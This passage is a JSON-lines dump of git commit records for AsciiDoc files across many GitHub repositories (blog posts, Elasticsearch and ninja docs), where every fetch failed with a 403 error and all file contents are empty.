2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_file":"_posts\/2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92d2b4db1db5144265929a98e48427bd567c5bb5","subject":"Update 2015-08-28-DIYDrone-Resources.adoc","message":"Update 2015-08-28-DIYDrone-Resources.adoc","repos":"Cribstone\/humblehacker,Cribstone\/humblehacker,Cribstone\/humblehacker","old_file":"_posts\/2015-08-28-DIYDrone-Resources.adoc","new_file":"_posts\/2015-08-28-DIYDrone-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cribstone\/humblehacker.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b0236999150e181040fa0d67ba12e65a691cb8b","subject":"#58 added initial doc to fix build","message":"#58 added initial doc to fix build\n","repos":"openwms\/org.openwms,openwms\/org.openwms","old_file":"org.openwms.tms\/org.openwms.tms.transportation\/src\/main\/asciidoc\/api.adoc","new_file":"org.openwms.tms\/org.openwms.tms.transportation\/src\/main\/asciidoc\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openwms\/org.openwms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b7e1d6fe3ecc94eb74f33d6444bea81af1fb3634","subject":"[Docs] Remove typo in painless-getting-started.asciidoc","message":"[Docs] Remove typo in painless-getting-started.asciidoc\n","repos":"scorpionvicky\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch","old_file":"docs\/painless\/painless-getting-started.asciidoc","new_file":"docs\/painless\/painless-getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e916f5633f409268e41638d44d1e72555c01f56a","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76b3224fb7735e8fe9b8ed01758d4ddd282cb032","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39a6b01442cb02c00b81e53c29bc248873fc96cd","subject":"y2b create post DON'T Buy The iPhone 8, Buy The iPhone 8.","message":"y2b create post DON'T Buy The iPhone 8, Buy The iPhone 8.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-23-DONT-Buy-The-iPhone-8-Buy-The-iPhone-8.adoc","new_file":"_posts\/2017-09-23-DONT-Buy-The-iPhone-8-Buy-The-iPhone-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07876f8c502ecbd7d6fda513ab4b7e70874e9ecd","subject":"Publish conference-java-Conference-annotations-java-compte-rendu.adoc","message":"Publish conference-java-Conference-annotations-java-compte-rendu.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"conference-java-Conference-annotations-java-compte-rendu.adoc","new_file":"conference-java-Conference-annotations-java-compte-rendu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab09a9b5c2a223a37a69ac798b0ee23c9167abd5","subject":"List of test suites","message":"List of test suites\n","repos":"MSG134\/IVCT_Framework,MSG134\/IVCT_Framework,MSG134\/IVCT_Framework","old_file":"docs\/testsuite-overview.adoc","new_file":"docs\/testsuite-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MSG134\/IVCT_Framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"742dab7fcb77cf3186815bdba15cf380ff5b8984","subject":"Update 2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","message":"Update 2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","new_file":"_posts\/2016-01-19-Why-I-am-reading-exactly-one-technical-article-per-day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85da0d3d3510311f8d9694cb28bf178d42c2fcae","subject":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","message":"Update 2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_file":"_posts\/2017-04-22-Speech-schedule-for-your-Google-Calendar-in-the-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88d7203813d93aeec2c45a27809a76a2ce706251","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed8696b4ceba2416876bc1dc09a23b24775103bd","subject":"Update 2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","message":"Update 2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","new_file":"_posts\/2016-07-25-Get-a-fake-REST-API-with-zero-coding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1fde706bd885ae9d4cf12ee3f9a91069214d493","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42561ed60aba74165d01be81f494501cdb9780bd","subject":"Oups...","message":"Oups...","repos":"tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,metlos\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,metlos\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a1bdf480c3f0bd0f6be8c43e48702f0580441a5","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c7517cd834fddb862d7e57a14360f0134536d46","subject":"Update 2016-6-27-PHP.adoc","message":"Update 2016-6-27-PHP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHP.adoc","new_file":"_posts\/2016-6-27-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bce477ca14980ec888b087ecf2b2471d2572ac9","subject":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","message":"y2b create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-19-Unboxing%20Google%20Home%20Mini%20With%20Demar%20DeRozan!.adoc","new_file":"_posts\/2017-12-19-Unboxing%20Google%20Home%20Mini%20With%20Demar%20DeRozan!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6d618556c1a9042af8cc069911dd248246e9e8e","subject":"rearrange env variable section layout","message":"rearrange env variable section layout\n","repos":"nafest\/ninja,kissthink\/ninja,sxlin\/dist_ninja,atetubou\/ninja,purcell\/ninja,sorbits\/ninja,kimgr\/ninja,atetubou\/ninja,synaptek\/ninja,mdempsky\/ninja,ndsol\/subninja,tfarina\/ninja,dendy\/ninja,pck\/ninja,glensc\/ninja,synaptek\/ninja,nocnokneo\/ninja,ninja-build\/ninja,ilor\/ninja,jimon\/ninja,kimgr\/ninja,tfarina\/ninja,nico\/ninja,lizh06\/ninja,TheOneRing\/ninja,bradking\/ninja,ignatenkobrain\/ninja,juntalis\/ninja,Maratyszcza\/ninja-pypi,syntheticpp\/ninja,iwadon\/ninja,syntheticpp\/ninja,ThiagoGarciaAlves\/ninja,dorgonman\/ninja,jendrikillner\/ninja,colincross\/ninja,rjogrady\/ninja,yannicklm\/ninja,Qix-\/ninja,hnney\/ninja,ignatenkobrain\/ninja,dorgonman\/ninja,dendy\/ninja,bradking\/ninja,drbo\/ninja,dpwright\/ninja,liukd\/ninja,guiquanz\/ninja,dabrahams\/ninja,mdempsky\/ninja,TheOneRing\/ninja,maruel\/ninja,hnney\/ninja,jhanssen\/ninja,pck\/ninja,dabrahams\/ninja,nafest\/ninja,tfarina\/ninja,dendy\/ninja,sgraham\/ninja,ctiller\/ninja,Maratyszcza\/ninja-pypi,syntheticpp\/ninja,rnk\/ninja,dabrahams\/ninja,ndsol\/subninja,moroten\/ninja,hnney\/ninja,ilor\/ninja,TheOneRing\/ninja,mgaunard\/ninja,Qix-\/ninja,sorbits\/ninja,nicolasdespres\/ninja,nicolasdespres\/ninja,nocnokneo\/ninja,sorbits\/ninja,liukd\/ninja,dorgonman\/ninja,iwadon\/ninja,guiquanz\/ninja,metti\/ninja,vvvrrooomm\/ninja,AoD314\/ninja,fifoforlifo\/ninja,sxlin\/dist_ninja,fuchsia-mirror\/third_party-ninja,maruel\/ninja,ikarienator\/ninja,sxlin\/dist_ninja,ndsol\/subninja,rnk\/ninja,rnk\/ninja,jimon\/ninja,pck\/ninja,ikarienator\/ninja,dpwright\/ninja,jsternberg\/ninja,mohamed\/ninja,nocnokneo\/ninja,fifoforlifo\/ninja,mgaunard\/ninja,nocnokneo\/ninja,Qix-\/ninja,nico\/ninja,autopulated\/ninja,automeka\/ninja,fifoforlifo\/ninja,martine\/ninja,moroten\/ninja,ndsol\/subninja,jendrikillner\/ninja,ilor\/ninja,nicolasdespres\/ninja,jhanssen\/ninja,mgaunard\/ninja,mohamed\/ninja,drbo\/ninja,Maratyszcza\/ninja-pypi,fuchsia-mirror\/third_party-ninja,rjogrady\/ninja,hnney\/ninja,lizh06\/ninja,moroten\/ninja,jsternberg\/ninja,Ju2ender\/ninja,ninja-build\/ninja,drbo\/ninja,juntalis\/ninja,iwadon\/ninja,TheOneRing\/ninja,purcell\/ninja,vvvrrooomm\/ninja,liukd\/ninja,metti\/ninja,nafest\/ninja,vvvrrooomm\/ninja,bmeurer\/ninja,bradking\/ninja,colincross\/ninja,mdempsky\/ninja,jsternberg\/ninja,kimgr\/ninja,purcell\/ninja,mydongistiny\/ninja,nickhutchinson\/ninja,yannicklm\/ninja,pathscale\/ninja,sxlin\/dist_ninja,ilor\/ninja,maruel\/ninja,AoD314\/ninja,bmeurer\/ninja,nicolasdespres\/ninja,juntalis\/ninja,kimgr\/ninja,fuchsia-mirror\/third_party-ninja,synaptek\/ninja,ikarienator\/ninja,maruel\/ninja,dpwright\/ninja,dpwright\/ninja,pathscale\/ninja,sxlin\/dist_ninja,bmeurer\/ninja,mydongistiny\/ninja,Maratyszcza\/ninja-pypi,jhanssen\/ninja,rnk\/ninja,liukd\/ninja,colincross\/ninja,nickhutchinson\/ninja,Ju2ender\/ninja,nico\/ninja,autopulated\/ninja,yannicklm\/ninja,ThiagoGarciaAlves\/ninja,iwadon\/ninja,fifoforlifo\/ninja,moroten\/ninja,pathscale\/ninja,jhanssen\/ninja,guiquanz\/ninja,purcell\/ninja,ThiagoGarciaAlves\/ninja,ignatenkobrain\/ninja,AoD314\/ninja,tfarina\/ninja,mohamed\/ninja,automeka\/ninja,martine\/ninja,guiquanz\/ninja,jsternberg\/ninja,lizh06\/ninja,sgraham\/ninja,kissthink\/ninja,atetubou\/ninja,mgaunard\/ninja,pck\/ninja,glensc\/ninja,sgraham\/ninja,synaptek\/ninja,drbo\/ninja,AoD314\/ninja,atetubou\/ninja,jendrikillner\/ninja,ctiller\/ninja,rjogrady\/ninja,ikarienator\/ninja,ninja-build\/ninja,ThiagoGarciaAlves\/ninja,vvvrrooomm\/ninja,kissthink\/ninja,Ju2ender\/ninja,syntheticpp\/ninja,yannicklm\/ninja,nafest\/ninja,ninja-build\/ninja,automeka\/ninja,metti\/ninja,sorbits\/ninja,nickhutchinson\/ninja,dendy\/ninja,ctiller\/ninja,rjogrady\/ninja,juntalis\/ninja,metti\/ninja,sxlin\/dist_ninja,jimon\/ninja,nickhutchinson\/ninja,sxlin\/dist_ninja,Qix-\/ninja,jimon\/ninja,autopulated\/ninja,mohamed\/ninja,lizh06\/ninja,bmeurer\/ninja,jendrikillner\/ninja,nico\/ninja,pathscale\/ninja,dabrahams\/ninja,automeka\/ninja,mdempsky\/ninja,colincross\/ninja,Ju2ender\/ninja,martine\/ninja,mydongistiny\/ninja,sgraham\/ninja,ignatenkobrain\/ninja,dorgonman\/ninja,ctiller\/ninja,martine\/ninja,kissthink\/ninja,mydongistiny\/ninja,autopulated\/ninja,glensc\/ninja,fuchsia-mirror\/third_party-ninja,glensc\/ninja,bradking\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d56f995ef0b86e46f87e596a87f16b4d636968f5","subject":"make doc xrefs link to section headers","message":"make doc xrefs link to section headers\n","repos":"glensc\/ninja,hnney\/ninja,yannicklm\/ninja,sxlin\/dist_ninja,ilor\/ninja,AoD314\/ninja,TheOneRing\/ninja,moroten\/ninja,sgraham\/ninja,sgraham\/ninja,mydongistiny\/ninja,sxlin\/dist_ninja,dendy\/ninja,rnk\/ninja,nicolasdespres\/ninja,juntalis\/ninja,bmeurer\/ninja,fuchsia-mirror\/third_party-ninja,jendrikillner\/ninja,nico\/ninja,rnk\/ninja,liukd\/ninja,bradking\/ninja,mohamed\/ninja,vvvrrooomm\/ninja,jhanssen\/ninja,purcell\/ninja,moroten\/ninja,autopulated\/ninja,maruel\/ninja,ThiagoGarciaAlves\/ninja,mydongistiny\/ninja,nickhutchinson\/ninja,fifoforlifo\/ninja,nocnokneo\/ninja,mgaunard\/ninja,dpwright\/ninja,glensc\/ninja,autopulated\/ninja,jhanssen\/ninja,fifoforlifo\/ninja,kimgr\/ninja,dabrahams\/ninja,purcell\/ninja,TheOneRing\/ninja,pck\/ninja,nico\/ninja,bmeurer\/ninja,atetubou\/ninja,colincross\/ninja,sorbits\/ninja,dabrahams\/ninja,vvvrrooomm\/ninja,sxlin\/dist_ninja,jendrikillner\/ninja,iwadon\/ninja,syntheticpp\/ninja,ikarienator\/ninja,purcell\/ninja,ndsol\/subninja,juntalis\/ninja,ikarienator\/ninja,syntheticpp\/ninja,jimon\/ninja,pathscale\/ninja,hnney\/ninja,ilor\/ninja,guiquanz\/ninja,nicolasdespres\/ninja,sgraham\/ninja,synaptek\/ninja,sorbits\/ninja,rnk\/ninja,moroten\/ninja,sxlin\/dist_ninja,atetubou\/ninja,rjogrady\/ninja,synaptek\/ninja,drbo\/ninja,moroten\/ninja,martine\/ninja,kissthink\/ninja,maruel\/ninja,drbo\/ninja,drbo\/ninja,sxlin\/dist_ninja,automeka\/ninja,tfarina\/ninja,ilor\/ninja,fuchsia-mirror\/third_party-ninja,jimon\/ninja,liukd\/ninja,Qix-\/ninja,Maratyszcza\/ninja-pypi,automeka\/ninja,nickhutchinson\/ninja,pathscale\/ninja,Maratyszcza\/ninja-pypi,dendy\/ninja,sxlin\/dist_ninja,jhanssen\/ninja,ikarienator\/ninja,metti\/ninja,mdempsky\/ninja,AoD314\/ninja,jhanssen\/ninja,Qix-\/ninja,nickhutchinson\/ninja,ignatenkobrain\/ninja,jendrikillner\/ninja,mdempsky\/ninja,nico\/ninja,mgaunard\/ninja,mydongistiny\/ninja,mohamed\/ninja,dabrahams\/ninja,autopulated\/ninja,bmeurer\/ninja,nafest\/ninja,kimgr\/ninja,ignatenkobrain\/ninja,glensc\/ninja,tfarina\/ninja,juntalis\/ninja,autopulated\/ninja,Maratyszcza\/ninja-pypi,synaptek\/ninja,kimgr\/ninja,ninja-build\/ninja,ninja-build\/ninja,guiquanz\/ninja,sorbits\/ninja,iwadon\/ninja,nafest\/ninja,metti\/ninja,metti\/ninja,colincross\/ninja,ikarienator\/ninja,ThiagoGarciaAlves\/ninja,yannicklm\/ninja,metti\/ninja,nafest\/ninja,AoD314\/ninja,jimon\/ninja,nicolasdespres\/ninja,nicolasdespres\/ninja,ignatenkobrain\/ninja,martine\/ninja,dorgonman\/ninja,fuchsia-mirror\/third_party-ninja,dorgonman\/ninja,nafest\/ninja,Qix-\/ninja,kimgr\/ninja,ninja-build\/ninja,pck\/ninja,jimon\/ninja,ThiagoGarciaAlves\/ninja,kissthink\/ninja,automeka\/ninja,fuchsia-mirror\/third_party-ninja,mdempsky\/ninja,yannicklm\/ninja,colincross\/ninja,pck\/ninja,drbo\/ninja,glensc\/ninja,liukd\/ninja,nocnokneo\/ninja,nocnokneo\/ninja,syntheticpp\/ninja,dorgonman\/ninja,mydongistiny\/ninja,dpwright\/ninja,nico\/ninja,mgaunard\/ninja,lizh06\/ninja,ctiller\/ninja,dpwright\/ninja,Ju2ender\/ninja,maruel\/ninja,ilor\/ninja,dorgonman\/ninja,hnney\/ninja,mgaunard\/ninja,juntalis\/ninja,rjogrady\/ninja,atetubou\/ninja,jendrikillner\/ninja,sxlin\/dist_ninja,lizh06\/ninja,mohamed\/ninja,rnk\/ninja,ninja-build\/ninja,automeka\/ninja,syntheticpp\/ninja,colincross\/ninja,maruel\/ninja,nocnokneo\/ninja,iwadon\/ninja,dendy\/ninja,bradking\/ninja,ignatenkobrain\/ninja,vvvrrooomm\/ninja,fifoforlifo\/ninja,liukd\/ninja,Maratyszcza\/ninja-pypi,tfarina\/ninja,hnney\/ninja,bradking\/ninja,AoD314\/ninja,pathscale\/ninja,kissthink\/ninja,rjogrady\/ninja,guiquanz\/ninja,atetubou\/ninja,sgraham\/ninja,sorbits\/ninja,lizh06\/ninja,martine\/ninja,ctiller\/ninja,dendy\/ninja,rjogrady\/ninja,ndsol\/subninja,Ju2ender\/ninja,TheOneRing\/ninja,pathscale\/ninja,kissthink\/ninja,pck\/ninja,guiquanz\/ninja,tfarina\/ninja,Qix-\/ninja,ctiller\/ninja,dpwright\/ninja,ThiagoGarciaAlves\/ninja,dabrahams\/ninja,purcell\/ninja,nickhutchinson\/ninja,mdempsky\/ninja,Ju2ender\/ninja,mohamed\/ninja,vvvrrooomm\/ninja,yannicklm\/ninja,ndsol\/subninja,bmeurer\/ninja,fifoforlifo\/ninja,iwadon\/ninja,ctiller\/ninja,synaptek\/ninja,lizh06\/ninja,ndsol\/subninja,martine\/ninja,Ju2ender\/ninja,bradking\/ninja,TheOneRing\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7c8dd08d77de52934549a0cb364cf567c0593281","subject":"y2b create post Nintendo 3DS Unboxing (US Version - Black)","message":"y2b create post Nintendo 3DS Unboxing (US Version - Black)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-27-Nintendo-3DS-Unboxing-US-Version--Black.adoc","new_file":"_posts\/2011-03-27-Nintendo-3DS-Unboxing-US-Version--Black.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdf40db1f6fc5c79d7bf26bb59c5949994fe0308","subject":"Update 2013-11-12-Mockito-le-mock-facile.adoc","message":"Update 2013-11-12-Mockito-le-mock-facile.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-11-12-Mockito-le-mock-facile.adoc","new_file":"_posts\/2013-11-12-Mockito-le-mock-facile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"313df4b6e5955edaa1823498fce9f3128fa16bc9","subject":"Update 2016-02-14-S-A-S-S-Compass-Review.adoc","message":"Update 2016-02-14-S-A-S-S-Compass-Review.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-02-14-S-A-S-S-Compass-Review.adoc","new_file":"_posts\/2016-02-14-S-A-S-S-Compass-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a5bac342ee43709af2d03364f98ff3c96475af","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 